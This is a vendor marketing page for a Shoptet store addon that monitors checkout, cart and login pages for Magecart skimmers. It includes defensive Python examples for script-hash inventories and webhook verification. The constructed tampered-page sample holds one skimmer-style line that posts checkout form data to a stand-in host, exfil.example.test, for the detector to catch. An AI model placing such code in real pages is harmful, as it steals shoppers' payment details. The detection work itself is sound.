Shoptet is the leading e-commerce platform in the Czech Republic and Slovakia. Every Shoptet store has a checkout, a cart, and a login page: exactly the pages attackers target with Magecart skimmers and supply-chain JavaScript injections. ScriptPatrol is building a dedicated Shoptet addon: OAuth-based onboarding, security monitoring from outside the storefront, and zero JavaScript injected into your customer pages. The addon is currently in early-access pilot; catalog listing with Shoptet is under review and we onboard pilot stores directly.
The Problem
A Magecart attack injects malicious JavaScript onto your checkout page. It silently copies card numbers, names, and CVVs as customers type them — before the payment gateway ever sees the data. Most merchants discover the breach weeks later, via a customer complaint or a bank report.
The defense is continuous monitoring: scan your checkout, cart, and login pages on a schedule, compare the scripts against a known-good baseline, and alert the moment anything changes. Simple in principle, but until now it required manual configuration and a developer to set up correctly.
Without the addon (15–30 minutes of setup):
- Create a ScriptPatrol account
- Add your domain and wait for the discovery scan
- Manually verify which discovered paths are the right ones
- Identify which pages are security-critical
- Configure monitoring schedule and alerts
- Remember to update the config when your store changes
With the Shoptet addon (once installed, zero configuration):
- Install the addon (during pilot: through direct onboarding with us)
- Shoptet performs the OAuth handshake — no API keys to paste
- Your ScriptPatrol account is auto-provisioned from your store's contact email
- Open the addon panel in Shoptet admin to see monitoring status
How the Addon Works
The addon is a hosted application that integrates with Shoptet via the official OAuth 2.0 addon API. It appears directly inside your Shoptet administration panel — no separate login, no external dashboard to manage. Installation follows the standard Shoptet addon flow.
Phase 1: Secure OAuth Handshake
When you install the addon, Shoptet sends a single-use OAuth code to our install endpoint. We exchange it server-to-server for an access token, which is stored encrypted at rest (AES-256-GCM). The OAuth scope is api, and the addon only reads the eshopId, store URL, and contact email — never orders, customers, or payment data. Your ScriptPatrol account is auto-created from this metadata; you never paste an API key.
Phase 2: Automatic Page Discovery
The addon knows Shoptet's URL patterns. It automatically registers the security-critical pages for your store: /pokladna (checkout), /kosik (cart), /a/prihlaseni (login), and /a/ucet (customer account). No manual configuration of page paths is needed; these are the pages a Magecart skimmer would target.
Phase 3: Continuous Monitoring
Once the baseline is created, ScriptPatrol scans your critical pages on a fixed schedule. Any change on those pages, whether a JavaScript file changed, a new script appeared, inline code was modified, or a security header changed, triggers an alert with the exact diff, the affected script, and an AI-powered risk assessment. Every event is timestamped and logged for your audit trail.
What You Get After Installing
The addon is the connection bridge. Once connected, ScriptPatrol monitors the scripts and security headers on your critical pages:
Checkout & payment page monitoring
Your /pokladna is watched on every scan cycle. Any script addition or modification triggers an immediate alert.
Cart, login, and account pages
Full coverage of /kosik, /a/prihlaseni, and /a/ucet alongside the checkout: every page where a customer enters credentials or payment details.
Security headers
CSP, HSTS, X-Frame-Options, and other headers are tracked alongside scripts. A loosened CSP, for example a new origin allowed in script-src or 'unsafe-inline' appearing, can be an early sign that a compromise is under way, because an injected script needs the policy to let it run.
All scripts — inline, external, third-party
Every script tag on the page is captured and hashed. Third-party analytics, payment widgets, and chat plugins are all monitored.
Risk score with an AI explanation on every detected change
Not all changes are threats. ScriptPatrol distinguishes a routine analytics update from a skimmer injection — so you get fewer alerts, on the things that matter.
SHA-256 script inventory for PCI DSS 4.0
Every script baseline is stored with its SHA-256 integrity hash. This is the integrity evidence that requirement 6.4.3 (an inventory of all payment-page scripts, each with an integrity check and a written justification) and requirement 11.6.1 (change and tamper detection on payment-page scripts and HTTP headers) call for. The written justification for each script stays with you; the inventory and hashes give you the list to justify against.
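As an added example of what Phase 3 and the SHA-256 inventory above amount to in practice, here is a minimal inventory-and-diff routine. This is illustrative code written for this page, not ScriptPatrol's own implementation: the page HTML, the external script bodies and the response headers are constructed inline (a real monitor fetches them over HTTPS), and the key scheme (script:, inline#, header:) is this example's choice.

```python
# Added example, not ScriptPatrol's code: a SHA-256 script inventory for one
# page and a diff of a later snapshot against it. Sample HTML, script bodies
# and headers below are constructed; a real monitor would fetch them over HTTPS.
import hashlib
from html.parser import HTMLParser

# Security headers tracked next to the scripts (PCI DSS 4.0 req. 11.6.1 covers
# HTTP headers as well as script contents of payment pages).
TRACKED_HEADERS = ("content-security-policy", "strict-transport-security", "x-frame-options")


def _sha256(data):
    if isinstance(data, str):
        data = data.encode("utf-8")
    return hashlib.sha256(data).hexdigest()


class _ScriptCollector(HTMLParser):
    """Collects external script src attributes and inline script bodies in page order."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None  # non-None while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None


def snapshot(html, fetched_scripts, headers):
    """Return {"script:<src>": sha256, "inline#<n>": sha256, "header:<name>": value}.

    fetched_scripts maps each external src to the bytes the monitor fetched for it;
    headers is the response header map with lower-case names."""
    c = _ScriptCollector()
    c.feed(html)
    c.close()
    inv = {}
    for src in c.external:
        body = fetched_scripts.get(src)
        inv["script:" + src] = _sha256(body) if body is not None else "UNFETCHED"
    for i, code in enumerate(c.inline):
        inv[f"inline#{i}"] = _sha256(code)  # keyed by position: a new inline block shows up as "added"
    for name in TRACKED_HEADERS:
        if name in headers:
            inv["header:" + name] = headers[name]
    return inv


def diff_snapshots(baseline, current):
    """Classify every inventory key as added, removed or modified."""
    return {
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
        "modified": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
    }


# ---- constructed sample data: baseline scan ----------------------------------
CDN = "https://cdn.example-shop.test/checkout.js"
BASELINE_HTML = (
    '<html><head><script src="' + CDN + '"></script>'
    '<script>window.shopConfig = {currency: "CZK"};</script>'
    '</head><body><form id="payment"></form></body></html>'
)
BASELINE_FETCHED = {CDN: b"// constructed stand-in for the checkout bundle\nexport const v = 1;\n"}
BASELINE_HEADERS = {
    "content-security-policy": "default-src 'self'; script-src 'self' https://cdn.example-shop.test",
    "strict-transport-security": "max-age=31536000",
    "x-frame-options": "DENY",
}

# Later scan (constructed): an inline skimmer-style block was appended, the CDN
# bundle changed, and the CSP was loosened to let both of them run.
CURRENT_HTML = BASELINE_HTML.replace(
    "</head>",
    "<script>document.forms[0].addEventListener('submit', e => fetch('https://exfil.example.test/c',"
    " {method: 'POST', body: new FormData(e.target)}));</script></head>",
)
CURRENT_FETCHED = {CDN: b"// constructed: tampered bundle\nexport const v = 1; hook();\n"}
CURRENT_HEADERS = dict(
    BASELINE_HEADERS,
    **{"content-security-policy": BASELINE_HEADERS["content-security-policy"]
       + " 'unsafe-inline' https://exfil.example.test"},
)


def demo():
    base = snapshot(BASELINE_HTML, BASELINE_FETCHED, BASELINE_HEADERS)
    cur = snapshot(CURRENT_HTML, CURRENT_FETCHED, CURRENT_HEADERS)
    return diff_snapshots(base, cur)


if __name__ == "__main__":
    for kind, keys in demo().items():
        print(f"{kind}: {keys}")
```

Running it reports the appended inline block as added, and both the CDN bundle and the Content-Security-Policy header as modified, which is the shape of alert the text describes. Inline scripts are keyed by position here, so reordering the page's own inline blocks would also surface as changes; keying by hash instead trades that noise for losing track of which slot changed.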
Security Architecture
The addon was built with a security-first approach and audited against Shoptet's addon security requirements and OWASP Top 10.
API Key Security
Stored secrets are encrypted at rest with AES-256-GCM. API keys are additionally hashed server-side and verified with a timing-safe comparison, so a database leak does not expose usable keys and response timing does not reveal how much of a presented key matched.
Webhook Integrity
Every webhook from Shoptet is checked against its HMAC signature before any processing, so a forged or tampered uninstall event is rejected. Replays of a genuine event are rejected as well; a signature check alone does not catch those, it takes a freshness or one-time check on top.
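The two checks above (hashed API keys with a constant-time compare, and HMAC-verified webhooks that also refuse replays), written out as an added example. This is not ScriptPatrol's code, and the webhook wire format is an assumption made for the example: a raw JSON body, a hex HMAC-SHA256 over that body in a signature header, and a "timestamp" field for freshness. The page does not describe Shoptet's actual webhook format; the shared secret and the "addon:uninstall" event name are constructed.

```python
# Added example, not ScriptPatrol's code. Webhook format (raw JSON body, hex
# HMAC-SHA256 in a signature header, a "timestamp" field) is an assumption made
# here; the page does not specify Shoptet's wire format.
import hashlib
import hmac
import json
import secrets
import time


# ---- API keys: store a hash, compare in constant time ----------------------
def new_api_key():
    return secrets.token_urlsafe(32)


def hash_api_key(key):
    # Keys are random high-entropy tokens, so a plain SHA-256 is adequate here;
    # slow password hashes are for low-entropy secrets, not for this.
    return hashlib.sha256(key.encode("utf-8")).hexdigest()


def api_key_matches(presented, stored_hash):
    # compare_digest does not stop at the first differing byte, so response
    # time does not leak how much of the hash matched.
    return hmac.compare_digest(hash_api_key(presented).encode(), stored_hash.encode())


# ---- webhooks: HMAC first, then freshness and one-time use -----------------
REPLAY_WINDOW_SECONDS = 300


class WebhookVerifier:
    def __init__(self, secret, now=time.time):
        self._secret = secret
        self._now = now        # injectable clock so the example is testable offline
        self._seen = set()     # signatures accepted inside the window (a shared store in production)

    def verify(self, raw_body, signature_hex):
        """Return (ok, event_or_reason). Nothing is parsed before the signature passes."""
        if not isinstance(signature_hex, str):
            return False, "bad signature"
        expected = hmac.new(self._secret, raw_body, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected.encode(), signature_hex.encode()):
            return False, "bad signature"
        try:
            payload = json.loads(raw_body)
        except ValueError:
            return False, "malformed body"
        if not isinstance(payload, dict):
            return False, "malformed body"
        ts = payload.get("timestamp")
        if not isinstance(ts, (int, float)) or abs(self._now() - ts) > REPLAY_WINDOW_SECONDS:
            return False, "stale or missing timestamp"
        if signature_hex in self._seen:
            return False, "replay"
        self._seen.add(signature_hex)
        return True, payload.get("event")


def sign(secret, raw_body):
    """The sender's side of the scheme; used here to construct test messages."""
    return hmac.new(secret, raw_body, hashlib.sha256).hexdigest()


def demo():
    secret = b"constructed-shared-secret"   # constructed; agreed out of band in reality
    fixed_now = 1_700_000_000
    v = WebhookVerifier(secret, now=lambda: fixed_now)

    body = json.dumps({"event": "addon:uninstall", "eshopId": 123456,
                       "timestamp": fixed_now - 5}).encode()
    sig = sign(secret, body)
    results = {"genuine": v.verify(body, sig)}
    results["replay"] = v.verify(body, sig)                                 # same message delivered again
    results["forged"] = v.verify(body.replace(b"123456", b"999999"), sig)   # body altered, old signature
    stale = json.dumps({"event": "addon:uninstall", "eshopId": 123456,
                        "timestamp": fixed_now - 3600}).encode()
    results["stale"] = v.verify(stale, sign(secret, stale))                 # valid signature, too old
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The order of checks matters: the body is not parsed until the signature has passed, so malformed or oversized input from an unauthenticated sender never reaches the JSON parser, and the replay set only grows with messages that carried a valid signature.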
TLS Enforcement
All API communication uses HTTPS. Certificate verification is always enabled. API keys are never sent as URL parameters.
Error Handling
No stack traces or internal paths are ever exposed to the admin UI. All errors are mapped to user-friendly messages with actionable guidance.
PCI DSS 4.0 Evidence
Beyond catching attacks, ScriptPatrol produces the script-inventory and change-detection evidence that PCI DSS 4.0 requires. Merchants who file SAQ A-EP or SAQ D need this for requirements 6.4.3 and 11.6.1.
Requirement 6.4.3 — Script Inventory and Authorization
- Complete baseline of all scripts on each payment page
- SHA-256 hashes for integrity verification
- Audit-ready evidence packs you can export
Requirement 11.6.1 — Change and Tamper Detection
- Scanning on a configurable schedule (11.6.1 calls for at least weekly, or at the frequency set by your targeted risk analysis)
- Alerting on any script addition, removal, or modification
- AI-powered severity classification on every change
Why Not a JavaScript Tag?
Some security vendors ask you to embed their JavaScript on your pages. This approach has a fundamental problem: the monitoring script becomes part of the attack surface. An attacker who controls the page can disable it. It only runs when a customer visits. And it adds another third-party script to the very pages you are trying to protect.
The ScriptPatrol addon takes a different approach. It configures the connection between your store and our external monitoring infrastructure, but it never injects any JavaScript into your storefront. Your checkout loads exactly as before. Monitoring happens externally and independently of customer traffic, so an attacker who controls the storefront cannot switch it off. The trade-off to be aware of: an external scanner sees only what the server returns to it, so a skimmer served only to selected visitors (by region, device or cookie) can evade a scan that does not look like a real shopper's request.
| | JavaScript Tag | ScriptPatrol Addon |
|---|---|---|
| Performance impact | Adds load time to every page view | Zero JS injected into your storefront |
| Tamper resistance | Can be disabled by attackers | Cannot be tampered with from the storefront |
| Monitoring coverage | Only when customers visit | Scheduled, independent of traffic |
| Attack surface | Adds another third-party script | No additional scripts on your pages |
| Setup | Paste code into your theme | Install addon — OAuth handshake, no keys to paste |
Getting Started
Join the pilot waitlist
Sign up at scriptpatrol.com and tell us you run a Shoptet store. During the pilot we onboard stores directly while catalog listing with Shoptet is under review.
Install the addon
We send the addon install link. Shoptet performs the OAuth handshake against our endpoint — single-use code exchanged server-to-server, no manual configuration.
Account auto-created
Your ScriptPatrol account is auto-provisioned from the store contact email Shoptet sends with OAuth. No API keys to copy, paste, or store.
Monitoring starts automatically
ScriptPatrol creates baselines for your payment pages (/pokladna, /kosik, /a/prihlaseni, /a/ucet) and begins continuous monitoring. You get an alert within minutes of each scan that finds a change.
Zero configuration after install. No code changes, no theme modifications, no API keys to manage.
Client-side security should not require a development team
If you run a Shoptet store, the addon brings continuous script monitoring without developers, configuration, or maintenance. The ScriptPatrol addon handles the technical integration so you can focus on what matters — knowing that any unauthorized change to your payment pages is caught fast.
The addon is in early-access pilot — join via the integrations page. Catalog listing with Shoptet is under review. Support for WooCommerce, PrestaShop, and other platforms is in development.